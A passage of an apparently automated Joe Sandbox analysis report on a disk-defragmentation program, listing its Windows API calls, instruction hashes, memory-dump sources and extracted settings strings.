                                                                                                                                                                                                                                                                                                • Opcode ID: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                                • Instruction ID: 2aae77fe05b5572fc9a22550ba8b2e73634bf3b6c40b7b563c05c91186231963
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 927e2202433fb9e42a6fe3e98e5b36a04668a5a885c84e3f0056aeb2df8c8ff7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6021D439B102224BD724DE68DD84BE73351DFC4325F5A4279ED098F382DB66EC468299
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,00000800,?,00000000), ref: 00463572
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00463581
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,00090073,?,00000008,00000000,?,?,00000000), ref: 004635C1
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004635C7
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ControlDeviceErrorLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2645620995-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 0041AADC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0041AAF4
                                                                                                                                                                                                                                                                                                • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041AB1C
                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 0041AB37
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExtentMessagePoint32ReleaseSendText
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3220701275-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00503B37
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00503B50
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00454FE5
                                                                                                                                                                                                                                                                                                • __alldvrm.LIBCMT ref: 00454FF8
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045500B
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00455044
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__alldvrm__allrem
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2089711351-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,?), ref: 0046D047
                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 0046D059
                                                                                                                                                                                                                                                                                                • SetCursor.USER32(?,?,?,?,0046CB00,?,00000000,?,?), ref: 0046D06F
                                                                                                                                                                                                                                                                                                • DestroyCursor.USER32(00000000), ref: 0046D07A
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load$Destroy
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2883253431-0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00000000), ref: 004676B7
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000003,000001F4), ref: 004676CC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000403,00000002,00001770), ref: 004676E1
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,00000190), ref: 004676F6
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                                • Instruction ID: 05ecc198b00069830d56908e8e3e5e7e1269b8f0e776762def572f81c0fca120
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e2714244d5c6f65102f12cb8e05017cbdfaef3b4b34307461ffb964c10c16d6
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF01D717C0B027AE2309A68DC82FA7A2A86B94B02F15582DF359FB1D196B875018E58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 59de480195b1ca1b7c85286dea745b7e675da52321248cfd22c7f778a576f342
                                                                                                                                                                                                                                                                                                • Instruction ID: d8bfd7cdfac141d9cfdb0ffece5a98f1ca78eb3dd6e2b02cd9253dc2d6ef05f2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59de480195b1ca1b7c85286dea745b7e675da52321248cfd22c7f778a576f342
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED137756083409FC314DF69C98092BFBE4BFC8314F05896EF99997311E739E8058BA6
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3BE
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045D3D1
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 885266447-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                                • Instruction ID: 5dffe6ef64173943b566a41739161ce8ce63ae2a9ff69b85a90aeb8992a9e3ab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fffd3d7282f3ca9193e1cd667b51c6e9b1393ee17bf43d276ed476b0d10faf7b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24A17A71A043099FC324EF68C98096AB7F5FF89305F14892EE89687312D774F949CB5A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __aulldiv
                                                                                                                                                                                                                                                                                                • String ID: `=
                                                                                                                                                                                                                                                                                                • API String ID: 3732870572-2762138152
                                                                                                                                                                                                                                                                                                • Opcode ID: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                                • Instruction ID: 84b8ef7fa6ef3b0704b7dcc146b1b846a3d4774a27478fb056f40241b994564c
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3015ac86ba649a29268a85483f7edd6aab0f416968bd909a9fe1b0c52b9cb0c5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46719C71A046049FC724EF64C884A6BB7E4FF88311F14896EFC4687352D775E849CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • SHQueryRecycleBinW.SHELL32(?,?), ref: 0042B1A8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterQueryRecycleSection
                                                                                                                                                                                                                                                                                                • String ID: C:\$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1132591718-3292444104
                                                                                                                                                                                                                                                                                                • Opcode ID: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                                • Instruction ID: acc36582b151d86fb2590580dfdaf1570fbc9ca1bde0f0bfc179c8702fc33688
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 85201a436fdb5bbfeaee31a0dc8f4d63786e17b77ffd3cec1582f3d352d27140
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F716D71604351CFC720EF64D981BAFB7E4FF88354F41892EE89997250D734A944CBAA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 00456370
                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?), ref: 004563C5
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                • String ID: P
                                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3110715001
                                                                                                                                                                                                                                                                                                • Opcode ID: a03a8c6beb439d679fb0db97629ae7733890abcb9a7f1691b148e1a86304f56b
                                                                                                                                                                                                                                                                                                • Instruction ID: d9fc715740b337443135b9810308ba2b6a4282878f9a2242fee2fe4f623e65b9
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a03a8c6beb439d679fb0db97629ae7733890abcb9a7f1691b148e1a86304f56b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6951A0716006119BC710DF68D88466AB7A4FF89715F514B2FED2487392CB78EC48CBDA
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoInitialize.OLE32(00000000), ref: 004197EE
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoCreateInstance.OLE32(0047D090,00000000,00000001,0047CFC0,?,?,?,00000000), ref: 00419812
                                                                                                                                                                                                                                                                                                  • Part of subcall function 004197C0: CoUninitialize.OLE32(?,?,00000000,?,?,?,?,?,?,?,?,?,00000000,00475709,000000FF,0041DB54), ref: 0041981C
                                                                                                                                                                                                                                                                                                • GetLogicalDrives.KERNEL32 ref: 00427273
                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 004272D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateCriticalDriveDrivesEnterInitializeInstanceLogicalSectionTypeUninitialize
                                                                                                                                                                                                                                                                                                • String ID: C:\
                                                                                                                                                                                                                                                                                                • API String ID: 2354564324-3404278061
                                                                                                                                                                                                                                                                                                • Opcode ID: 463b7e134fd02c2dffb61464138cf62a3387c166cfc111da7965f15e78b5fef1
                                                                                                                                                                                                                                                                                                • Instruction ID: c90efa92af71126dba6429048660511b38e7c0dbb77debf846213f4ca3b284e1
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 463b7e134fd02c2dffb61464138cf62a3387c166cfc111da7965f15e78b5fef1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A518971A187519FC314DF29D881A5BBBE4FF88714F804A2EF899C7390D734A904CB8A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00430FF8
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • DefragFinishRingtone, xrefs: 0043102A
                                                                                                                                                                                                                                                                                                • DiskDefrag\Setting Option\Gereral, xrefs: 0043102F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: DefragFinishRingtone$DiskDefrag\Setting Option\Gereral
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-1318132366
                                                                                                                                                                                                                                                                                                • Opcode ID: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                                • Instruction ID: 0a2994e761213e214e5a4d6a869241ea1e3b325438042f93d97e0811baed8686
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 611e42f2e74a1490c92c656b9c1f4233f09f845737786cc1f03fb69b9647b0cb
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE41717074820566EA30B7725D23BAF21489F1CB98F00562FFA19953C2FBEDD885859F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Catch
                                                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                                • API String ID: 78271584-2084237596
                                                                                                                                                                                                                                                                                                • Opcode ID: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                                • Instruction ID: 7f3e499a65fa1b5ee95370a69dc2f62e8b798b9dea4c67a4a9596effe2b86ecb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 60d334a2babda9015152320fb1b56685fe8a5b2565357ad46f9000524526b17b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 754159B1900209AFCF15DF98CD85AEEBFB5BF48304F1485A9FA04A6291D335AD60DF50
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00426DC0: EnterCriticalSection.KERNEL32(?,1088D068,?,?), ref: 00426E01
                                                                                                                                                                                                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00422CFC
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CriticalEnterRedrawSectionWindow
                                                                                                                                                                                                                                                                                                • String ID: DiskChecked$DiskDefrag
                                                                                                                                                                                                                                                                                                • API String ID: 142774367-2981518532
                                                                                                                                                                                                                                                                                                • Opcode ID: ab5195b4a4bfda73d4f9f3e8bf5c99e646ac860a453a11dc9c20344d76e4ff99
                                                                                                                                                                                                                                                                                                • Instruction ID: c399ede082bf33e8358967d7bf4ff09710be0966645c3ad0fdc692b3c116348a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab5195b4a4bfda73d4f9f3e8bf5c99e646ac860a453a11dc9c20344d76e4ff99
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE21B1726003189BC728EE1DDD85BDAB7A0AF84700F90452DFE158F282DBB4AA04C798
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: ~P
                                                                                                                                                                                                                                                                                                • API String ID: 0-500931198
                                                                                                                                                                                                                                                                                                • Opcode ID: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
                                                                                                                                                                                                                                                                                                • Instruction ID: 3f53a812ee88c614be39cb66f25ae1a6b01f6845a1ee28e41b72ee3cff38c9b7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af959c50f9ceb22731f565f3fb959b59621721a55135329773564823bcb7b730
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62215E72A0820AAFDB10AF619C45A7E7FA9FF493647108525F915971D1D730FC5097A0
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DE53
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                                • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                                • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                                • Opcode ID: cc76f1b3ff457465d13abcf68c2bcec90b57b123ad2d10895c62ec857d4069d2
                                                                                                                                                                                                                                                                                                • Instruction ID: c621563c8422bd9a998db8b3ae63383a0df01fc5d31629062189869ad5b1e679
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc76f1b3ff457465d13abcf68c2bcec90b57b123ad2d10895c62ec857d4069d2
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16316AB1908701AFC314DF64DD85B5ABBE4FB88710F00492EF94A97290E735E948CB9A
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(0047D9D0,00001037,00000000,00000000), ref: 004322A8
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00432180: SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004322BC
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,?,00000000), ref: 00432160
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: DiskDefrag\Setting Option\Optimize$cbbFileSize
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-4101677200
                                                                                                                                                                                                                                                                                                • Opcode ID: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction ID: c484c337b78f61a7d82ad98e4e7a9c8d2f838ff1f30f5547f561464bca46b6c3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d012cc000ad30419fbe295ad9283da05f428964ef3f062ec2218de17c19c3bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 530121707D021A2BEA147E7A8D93FBE01498B85B08F00993E760BDE2C7CDDD8D484229
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetVolumeNameForVolumeMountPointW.KERNEL32(?,00000000), ref: 0041DF73
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Volume$MountNamePoint
                                                                                                                                                                                                                                                                                                • String ID: C:\$DiskDefrag\SSD
                                                                                                                                                                                                                                                                                                • API String ID: 1269602640-2872339364
                                                                                                                                                                                                                                                                                                • Opcode ID: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                                • Instruction ID: 5d073b895f258575d86a17cdac6f59c45116d1a3496c0b5e65ce3dbb7a15869e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bf0067fdc715ad62ea400fca28faee1260d6c25cd8764403d7545c4f3a7dbe9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B213CB5908301DFC304DF64D985B9ABBE4FF98710F004A2EF45A83290EB74D588CB96
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                                                • String ID: 3402044$CPUIdleTime
                                                                                                                                                                                                                                                                                                • API String ID: 3850602802-2665702501
                                                                                                                                                                                                                                                                                                • Opcode ID: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction ID: 11bcaded1eea4243ffe6df52d9d88ed76b2ab53cb2a3c081b775842c2c83da62
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54736f6ff506063360bc645a57596676f049b47f42f9e55dd83d5a70f70a9f2e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D1182B1644601AFD314DF14DD85FAAB7A4FF48B20F10862EF55EA32D0DB78A844CB59
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                                Strings
